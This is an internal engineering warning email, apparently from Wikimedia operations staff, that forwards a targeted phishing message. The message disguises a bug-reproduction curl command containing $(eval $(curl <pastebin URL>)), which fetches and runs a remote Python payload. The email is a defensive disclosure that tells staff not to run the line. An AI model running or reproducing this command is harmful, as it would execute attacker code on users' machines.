[Engineering] PLEASE READ: (unsuccesful) compromise attempt

Thu Jun 15 19:12:23 UTC 2017

Hi,

DO NOT RUN THE COMMAND BELOW. Please read this email in full.

I just got an email, foundd below, which seems initially legitimate, but
on a more careful read is malicious and an attempt to compromise my
computer. Thankfully I don't have the habit of copy/pasting commands on
my terminal and I read this email carefully, so I was not a victim of
this.

The email seems innocuous enough, by mentioning my name and an otherwise
legitimate body pointing an API issue with a URL that looks like an
api.php URL of ours. It suggests running a curl to reproduce, but if you
look more carefully, that curl has $(eval $(curl
https://pastebin.com/raw/xSWbdNAK) in it.

That pastebin URL above contains an exec() of a base64 string, which, in
turn, decoded, is a Python script that fetches and exec()s the contents
of a URL. I have NOT fetched that URL yet, so I don't know what the
contents are.  I'd advise to not do that either, unless done carefully
from a sandboxed, unprivileged environment. It will also likely let the
attacker know that someone accessed it, and possibly let them know that
we're on to them.

Please be on the lookout for similar attempts, and let security@ and ops
know immediately if you get similar ones, or if you are suspicious of
any other emails or weird behavior on your computer. Please also let us
know IMMEDIATELY if you suspect you fell victim of one of these attacks.
Make sure to confirm that your message was received. If in doubt, call
me or other opsens on our cellphones, as found on officewiki's
Contact_list.

We also had a targeted phising attempt last week, by someone pertaining
to be Katherine and attempting to extract donor data, so it's possible
it's the same person trying a different angle. They may try another
angles as well, so I'd advise everyone to be vigilant.

Best,
Faidon
--
Faidon Liambotis
Principal Operations Engineer
Wikimedia Foundation

----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com> -----

Date: Thu, 15 Jun 2017 10:45:35 -0700
From: Joshua Wilson <joshuaswillson at gmail.com>
To: fliambotis at wikimedia.org
Subject: Wikipedia REST API Issues

Greetings Faidon,

It seems as if the api `query` endpoint at the English Wikipedia is down. A
simple "hello"
api call as shown below responds with an internal server error. Further
calls to the same
endpoint result in the request timing out, until the endpoint is reachable
again.

[added by faidon: DO NOT RUN THIS COMMAND]
curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval $(curl
https://pastebin.com/raw/xSWbdNAK)
\\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
[added by faidon: DO NOT RUN THIS COMMAND]

I'm interested in using english wikipedia data for some AI language
comprehension research.

If you could take a look, and possibly let me know if/when this service
will be up, I would
greatly appreciate it. I couldn't find any scheduled downtime information
online, so I apologize
if this behavior is expected.

Thanks,

Chelsea Anders

----- End forwarded message -----